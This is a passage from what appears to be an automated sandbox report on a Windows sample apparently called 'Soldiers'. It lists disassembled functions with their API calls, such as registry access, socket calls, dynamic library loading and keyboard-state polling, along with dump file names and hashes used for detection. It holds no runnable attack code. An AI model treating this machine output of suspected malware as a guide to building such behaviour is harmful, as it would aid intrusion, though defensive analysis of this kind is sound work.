                                                          • SetErrorMode.KERNEL32(00000001), ref: 0094B297
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0094B2EB
                                                          • __swprintf.LIBCMT ref: 0094B304
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00970980), ref: 0094B342
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: 8f46b6c66bd30c909de9e2127730d9d455a40b27c96eacba5099cc21b344fac3
                                                          • Instruction ID: 38fdb18699d6be10c33e28676b822244703aa1cf9cd80ca48f71880a1bbde3da
                                                          • Opcode Fuzzy Hash: 8f46b6c66bd30c909de9e2127730d9d455a40b27c96eacba5099cc21b344fac3
                                                          • Instruction Fuzzy Hash: 75214135A00209EFCB10DFA5CC45EAEB7B8EF89714B108069F909D7292DB31EA45DB61
                                                          Function 0093AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                            • Part of subcall function 0093AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0093AA6F
                                                            • Part of subcall function 0093AA52: GetWindowThreadProcessId.USER32(?,00000000,00000000), ref: 0093AA82
                                                            • Part of subcall function 0093AA52: GetCurrentThreadId.KERNEL32 ref: 0093AA89
                                                            • Part of subcall function 0093AA52: AttachThreadInput.USER32(00000000), ref: 0093AA90
                                                          • GetFocus.USER32(00970980), ref: 0093AC2A
                                                            • Part of subcall function 0093AA9B: GetParent.USER32(?), ref: 0093AAA9
                                                          • GetClassNameW.USER32(?,?,00000100,?), ref: 0093AC73
                                                          • EnumChildWindows.USER32(?,0093ACEB,?,?), ref: 0093AC9B
                                                          • __swprintf.LIBCMT ref: 0093ACB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                          • String ID: %s%d
                                                          • API String ID: 1941087503-1110647743
                                                          • Opcode ID: 54f8864a02ab7e3e836a768e5558e40a306d42e02bf64890ab66f51dcdc17df7
                                                          • Instruction ID: 48fb4d10e899cf16281363dc7e4e3b20205272d6ca3905cc0338d13f27f76191
                                                          • Opcode Fuzzy Hash: 54f8864a02ab7e3e836a768e5558e40a306d42e02bf64890ab66f51dcdc17df7
                                                          • Instruction Fuzzy Hash: 4611D276200208ABCF11BFA08D85FEA37ACEBC4700F004075FE88EA182CA705945DF72
                                                          Function 009422E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00942318
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          • Opcode ID: 1f845313280b7874a5e1c68109e9f31f1ddf0153efb7917c22b860aa18f97b3d
                                                          • Instruction ID: 5083718093e72eae4538b69a8e5ba80ab5dcd8a9ffe789261b31e0765020c0b4
                                                          • Opcode Fuzzy Hash: 1f845313280b7874a5e1c68109e9f31f1ddf0153efb7917c22b860aa18f97b3d
                                                          • Instruction Fuzzy Hash: 3F113C30904218DFCF24EFA8D9519EEB7B8FF55744F504469E814A72A1EB365E06CB50
                                                          Function 0095F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0095F2F0
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0095F320
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0095F453
                                                          • CloseHandle.KERNEL32(?), ref: 0095F4D4
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: 1239ca9d4b11f4037af1fcd6129fd843c5379a485b6cfdc5581219f1dd2422a8
                                                          • Instruction ID: 7c4be2625d4ec5d451ed69b7638b2938b5cccf6b09c31714138b06de47a4ed2e
                                                          • Opcode Fuzzy Hash: 1239ca9d4b11f4037af1fcd6129fd843c5379a485b6cfdc5581219f1dd2422a8
                                                          • Instruction Fuzzy Hash: 9081A171604700AFD720EF2ADC56B2AB7E5FF84720F14881DF959DB292D7B0AC448B92
                                                          Function 0090563D Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                          • Instruction ID: ed8ef8940d654cb2948e39acd69a9cca416b4621b101936788c2b7ebc2f01ec1
                                                          • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                          • Instruction Fuzzy Hash: CA51B330A00B09DFDB249FB9C8806AF77B9AF44320F658B29F835962D0D7759D90AF40
                                                          Function 00960697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0096147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096040D,?,?), ref: 00961491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096075D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096079C
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009607E3
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0096080F
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0096081C
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: 29e2978f701f814a81b0b569cad7e0ec9be144c00d79186b31381fda5137ca60
                                                          • Instruction ID: 9424786d216384f8652aa29c4403b9ba8e429d25189fdcd47b01ce0aed920590
                                                          • Opcode Fuzzy Hash: 29e2978f701f814a81b0b569cad7e0ec9be144c00d79186b31381fda5137ca60
                                                          • Instruction Fuzzy Hash: 1C513671218208AFD714EBA8CC85F6BB7E9FF84714F04892DF599872A1DB31E904CB52
                                                          Function 00956E32 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00958475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009584A0
                                                          • #23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00956E89
                                                          • #111.WSOCK32(00000000), ref: 00956EB2
                                                          • #2.WSOCK32(00000000,?,00000010), ref: 00956EEB
                                                          • #111.WSOCK32(00000000), ref: 00956EF8
                                                          • #3.WSOCK32(00000000,00000000), ref: 00956F0C
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: #111
                                                          • String ID:
                                                          • API String ID: 568940515-0
                                                          • Opcode ID: 46b606fe82c415eeb70b9c7f0697390e559ed96036de6b55f44c585c89eaad7e
                                                          • Instruction ID: f4b9c25260bc38f1bdd1a0fcae2315b5da916d46d6b0f0c7bedc1b6c59cbace3
                                                          • Opcode Fuzzy Hash: 46b606fe82c415eeb70b9c7f0697390e559ed96036de6b55f44c585c89eaad7e
                                                          • Instruction Fuzzy Hash: 3D41E475700204AFEB10AF69DC86F7E73A8EF45710F048558FA19EB3D2DA709D008BA2
                                                          Function 0095DFB1 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0095E010
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0095E093
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095E0AF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0095E0F0
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0095E10A
                                                            • Part of subcall function 008F402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947E51,?,?,00000000), ref: 008F4041
                                                            • Part of subcall function 008F402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947E51,?,?,00000000,?,?), ref: 008F4065
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: 0237504345abe5984de60cad8b3c030e9b3563fd0db9518319c62fb92e267f5d
                                                          • Instruction ID: f84d8fff42bca49ad0d7105d6103a3fab4c03aa8292493181163ffc01848f645
                                                          • Opcode Fuzzy Hash: 0237504345abe5984de60cad8b3c030e9b3563fd0db9518319c62fb92e267f5d
                                                          • Instruction Fuzzy Hash: 1F516975A04609DFCB04EFA9C8848ADB7F8FF49311B048065E919EB352DB31AE49CF52
                                                          Function 0094EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0094EC62
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0094EC8B
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0094ECCA
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0094ECEF
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0094ECF7
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 15a197b2748411dc15d6ebca6a5932e45de8cf58014569f8c7af7f7ae4943e90
                                                          • Instruction ID: 3c51771b759469607e252a6195eec87e289f60a368d6a1304b709c27f172d9e0
                                                          • Opcode Fuzzy Hash: 15a197b2748411dc15d6ebca6a5932e45de8cf58014569f8c7af7f7ae4943e90
                                                          • Instruction Fuzzy Hash: 7B514A35A00109DFDB01EF69C985EAEBBF5FF49314B148099E849AB3A2CB31ED41DB51
                                                          Function 0096A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02ec76efdadde56a0afae4435b78e090a6ad64ce9941dba97deddde55a7c3d09
                                                          • Instruction ID: 854b994fc348b3eedaf598926030f3370c200f91c1ea2366c7d4b27f805d7a89
                                                          • Opcode Fuzzy Hash: 02ec76efdadde56a0afae4435b78e090a6ad64ce9941dba97deddde55a7c3d09
                                                          • Instruction Fuzzy Hash: 9441D175D04104AFDB10DB28CC88FA9BBB8EB4A350F140165F91AB72E1C674AD41EE91
                                                          Function 008E2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCursorPos.USER32(?,?,009A77B0,?,009A77B0,009A77B0,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?), ref: 008E2727
                                                          • ScreenToClient.USER32(009A77B0,?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001), ref: 008E2744
                                                          • GetAsyncKeyState.USER32(?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001,?), ref: 008E2769
                                                          • GetAsyncKeyState.USER32(?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001,?), ref: 008E2777
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 3d49adf8834a47d3d33255c4d6caabaecb17acd9d3145fe5f3e9d43d0e677190
                                                          • Instruction ID: e9573ffa2374436ee6655136a7390e158dc07db0ba05d5e90be5ac6a1f711299
                                                          • Opcode Fuzzy Hash: 3d49adf8834a47d3d33255c4d6caabaecb17acd9d3145fe5f3e9d43d0e677190
                                                          • Instruction Fuzzy Hash: D0418075608259FFDF199F69CC44AE9BB78FB46324F10835AF829D2290C730AD90DB91
                                                          Function 008E52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,008EBCD4,?,?), ref: 008E52E6
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E534A
                                                          • TranslateMessage.USER32(?,?), ref: 008E5356
                                                          • DispatchMessageW.USER32(?), ref: 008E5360
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchTranslate
                                                          • String ID:
                                                          • API String ID: 1795658109-0
                                                          • Opcode ID: 30a1a93f05db102b8a4a20beff3a88799015d1d89753e68644abee2bfb09c864
                                                          • Instruction ID: 628e6d629f55196954914731086c50524c88ec54bdab6f3c94e3ead32fac432a
                                                          • Opcode Fuzzy Hash: 30a1a93f05db102b8a4a20beff3a88799015d1d89753e68644abee2bfb09c864
                                                          • Instruction Fuzzy Hash: 563114306187899AEB308BA58C45BE9B7E8FB4330CF10005AE522C72D1D7B5A985E751
                                                          Function 009395D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 009395E8
                                                          • PostMessageW.USER32(?,00000201,00000001,?,?,?), ref: 00939692
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0093969A
                                                          • PostMessageW.USER32(?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009396A8
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009396B0
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: ee1f2cdc02d09817841776edcffeac17b0828c5e8b822094c076d821fb5006af
                                                          • Instruction ID: acecac76ec81910e0ec3317b2f45e555039149d2a4d78886f6eecd5133bad295
                                                          • Opcode Fuzzy Hash: ee1f2cdc02d09817841776edcffeac17b0828c5e8b822094c076d821fb5006af
                                                          • Instruction Fuzzy Hash: DE31BF72505219EBDB14CF68D94DB9E3BB9FB84319F104219F929AA1D0C3B09964DF90
                                                          Function 0093BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?,?,?,?,?), ref: 0093BD9D
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000,?,?,?,?), ref: 0093BDBA
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000,?,?,?,?), ref: 0093BDF2
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0093BE18
                                                          • _wcsstr.LIBCMT ref: 0093BE22
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: 20ca0449c49cb479604658bda7ef203d91f22fb0ceb89fc23006b7a871f72141
                                                          • Instruction ID: 8844379a2787b06e9ad59b56d9e063dc262ed395689f86e6f997ee2849e0ed0a
                                                          • Opcode Fuzzy Hash: 20ca0449c49cb479604658bda7ef203d91f22fb0ceb89fc23006b7a871f72141
                                                          • Instruction Fuzzy Hash: B721D772208244BEEB255B39DC59EBB7BADDF85760F104029FA09CA1D1EB61DC5096A0
                                                          Function 0096B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
